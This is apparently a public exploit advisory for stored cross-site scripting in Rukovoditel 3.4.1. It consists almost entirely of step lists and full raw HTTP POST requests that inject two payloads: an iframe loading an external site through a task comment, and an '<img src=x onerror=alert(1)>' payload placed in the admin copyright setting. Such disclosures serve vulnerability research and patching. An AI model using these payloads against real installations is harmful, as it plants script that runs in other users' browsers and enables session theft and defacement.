Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs: Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task
4. open task
5. add comment as "<iframe src="https://14.rs"></iframe> "
POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=
===========================
###XSS-2###
===========================
1.go to admin account
2.go to configration => applicaton
3.Copyright Text set as "<img src=x onerror=alert(1)>"
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"
ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"
Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"
ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
0
-----------------------------12298384558648010343132232769--